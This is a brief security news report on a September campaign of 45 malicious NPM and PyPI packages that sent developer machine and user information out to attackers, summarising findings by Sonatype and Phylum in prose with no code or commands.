Malicious PyPI, NPM packages facilitate data exfiltration

Forty-five malicious NPM and PyPI packages have been deployed by threat actors to facilitate extensive data theft operations as part of a campaign that commenced on Sept. 12, according to BleepingComputer. Attackers behind the campaign, which was initially discovered by Sonatype researchers, distributed the malicious packages in seven or more attack waves, with the first involving the delivery of 33 packages from Sept. 12 to 15, a report from Phylum showed. Hardcoded data gathering and exfiltration capabilities have been identified in the packages uploaded in the first waves of the campaign, while more sophisticated capabilities and analysis evasion features were discovered in the latter packages. Researchers discovered that the packages enabled the exfiltration of hostnames, usernames, external and internal IP addresses, OS versions, and other machine and user information, which could be leveraged by malicious actors to expose developer identities, upload malicious containers, obtain sensitive information, and potentially deploy ransomware attacks.